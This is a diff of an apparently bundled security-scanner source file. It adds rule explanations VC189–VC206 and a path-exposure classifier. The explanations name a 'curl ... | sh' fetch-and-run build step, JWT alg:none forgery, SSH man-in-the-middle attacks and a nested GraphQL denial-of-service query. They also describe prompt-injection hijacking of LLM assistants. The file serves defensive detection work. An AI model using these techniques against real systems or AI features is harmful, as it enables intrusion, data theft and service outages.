VC189: "RUN curl ... | sh executes whatever the upstream server returns at build time \u2014 no checksum, no pin. A compromise of the install host (or a subdomain takeover) bakes attacker code into your image with no audit trail.",
|
|
465
|
+
VC190: "Without HEALTHCHECK, an orchestrator can't tell that a deadlocked or DB-pool-exhausted container is broken \u2014 it stays in the load balancer rotation serving 500s to users until a human notices and intervenes.",
|
|
466
|
+
VC191: "verify=False disables TLS validation \u2014 anyone on the network path between your server and the upstream can intercept and modify the response, potentially feeding poisoned data into your app or stealing the API key in the request.",
|
|
467
|
+
VC192: "Jinja2 with autoescape=False renders user input as raw HTML \u2014 any field a user controls becomes a stored XSS vector, executing JavaScript in every other user's browser when the template renders.",
|
|
468
|
+
VC193: "tempfile.mktemp() returns a path without creating the file. An attacker with local access can win the race by creating a symlink at that path before your code opens it, redirecting your write to /etc/passwd or any other file your process can write.",
|
|
469
|
+
VC194: "mark_safe() with non-literal input tells Django to skip HTML escaping on attacker-influenced content \u2014 turning the whole page into stored XSS that runs in every viewer's browser.",
|
|
470
|
+
VC195: "AutoAddPolicy silently trusts whatever host key is presented on first connect \u2014 an attacker MITM-ing the SSH session presents their own key, gets accepted, and intercepts every command and credential in the session.",
|
|
471
|
+
VC196: "ALLOWED_HOSTS = ['*'] disables Host header validation. Attackers craft requests with fake Host headers used in password-reset URLs and cache keys \u2014 poisoning password reset emails to point at attacker domains and corrupting CDN caches.",
|
|
472
|
+
VC197: "PyJWT decode without an algorithms= allowlist accepts whatever algorithm the token claims, including alg:none. Attackers strip the signature, change the user_id to admin, and the server treats the forged token as valid.",
|
|
473
|
+
VC198: "User input concatenated into a model message lets attackers override your assistant's instructions \u2014 exfiltrating system prompts, jailbreaking content rules, or hijacking the assistant to act in the attacker's interest within the user's session.",
|
|
474
|
+
VC199: "A system prompt is the highest-trust part of an LLM context. Any non-literal data interpolated into it lets attackers modify the assistant's identity, safety rules, or tool boundaries \u2014 silently turning your AI feature into theirs.",
|
|
475
|
+
VC200: "Models can be prompted to emit <script> tags or javascript: links. Rendering output via dangerouslySetInnerHTML or innerHTML turns prompt injection into ordinary XSS \u2014 full session hijack on any user who triggers the attacker-controlled response.",
|
|
476
|
+
VC201: "A vector query with no user/tenant filter returns matches from every customer's embedded documents. In a multi-tenant RAG app, User A's question retrieves User B's private docs and the LLM cheerfully reads them aloud \u2014 silent cross-tenant data leak.",
|
|
477
|
+
VC202: "Inserting embeddings without a user/tenant tag makes per-user filtering at query time impossible \u2014 even if you remember to filter on read, there's nothing to filter on. This is the source-side fix for the RAG cross-tenant leak.",
|
|
478
|
+
VC203: "An LLM call without max_tokens lets attackers craft inputs that maximize output length, generating expensive responses on every request \u2014 denial-of-wallet that drains your monthly budget or trips rate limits for legitimate users.",
|
|
479
|
+
VC204: "Without a query depth limit, attackers send 100-level-deep nested queries that explode in resolver and DB cost. The server walks every level, the database does too, and a single crafted query takes the service down.",
|
|
480
|
+
VC205: "Even with a depth limit, queries like users(first:1000){posts(first:1000){comments(first:1000)}} are only three levels deep but resolve a billion items. Without complexity analysis, attackers DoS your GraphQL with a single request.",
|
|
481
|
+
VC206: "Apollo Server's csrfPrevention guards against cross-site form-style requests against GraphQL mutations. Disabling it lets any website trigger mutations in a logged-in user's browser \u2014 buying, deleting, or transferring on the victim's behalf."
|
|
286
482
|
};
|
|
287
483
|
|
|
484
|
+
// src/exposure.ts
|
|
485
|
+
function classifyExposure(filePath) {
|
|
486
|
+
if (/(?:\/api\/|pages\/api\/|routes?\/|controllers?\/|endpoints?\/|server\.|app\/.*route\.)/.test(
|
|
487
|
+
filePath
|
|
488
|
+
)) {
|
|
489
|
+
return "public";
|
|
490
|
+
}
|
|
491
|
+
if (/(?:app\/.*page\.|pages\/(?!api\/)|views?\/|templates?\/)/.test(filePath)) {
|
|
492
|
+
return "public";
|
|
493
|
+
}
|
|
494
|
+
if (/(?:lib\/|utils?\/|helpers?\/|services?\/|models?\/|hooks?\/)/.test(
|
|
495
|
+
filePath
|
|
496
|
+
)) {
|
|
497
|
+
return "internal";
|
|
498
|
+
}
|
|
499
|
+
if (/(?:middleware|config|constants?)/.test(filePath)) {
|
|
500
|
+
return "internal";
|
|
501
|
+
}
|
|
502
|
+
return "unknown";
|
|
503
|
+
}
|
|
504
|
+
|
|
288
505
|
// src/ast/parse.ts
|
|
289
506
|
var import_parser = require("@babel/parser");
|
|
290
507
|
var MAX_CACHE = 256;
|
|
@@ -8102,6 +8319,7 @@ function scanEntropy(files) {
|
|
|
8102
8319
|
calculateGrade,
|
|
8103
8320
|
callSpreads,
|
|
8104
8321
|
callbackHell,
|
|
8322
|
+
classifyExposure,
|
|
8105
8323
|
clickjacking,
|
|
8106
8324
|
clientComponentSecret,
|
|
8107
8325
|
clientSideAuth,
|